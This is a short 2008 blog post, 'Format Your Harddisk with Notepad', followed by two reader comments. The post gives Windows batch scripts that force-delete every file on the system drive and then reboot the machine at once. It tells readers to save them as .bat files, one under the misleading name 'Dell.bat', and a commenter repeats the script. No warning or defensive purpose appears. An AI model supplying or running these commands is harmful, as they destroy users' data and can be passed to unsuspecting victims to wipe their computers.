Saturday, June 21, 2008

Format Your Harddisk with Notepad

go to notepad
@Echo off
Del C:\ *.*y
save it as Dell.bat

or worse

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00


and save it as a .bat file

2 comments:

Anonymous said...

YOUR THE MAN!...................vry vry vry vry vry thnx.............:D(um vry grateful 2 u)...........nd 1thing........add me if ya can......my email address is- natural_cyborg@hotmail.com......i've got facebook 2...........search wid my email address n u'll find me 4 sure........:D

Nawaz Bazmi said...

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
what will heppen after run this????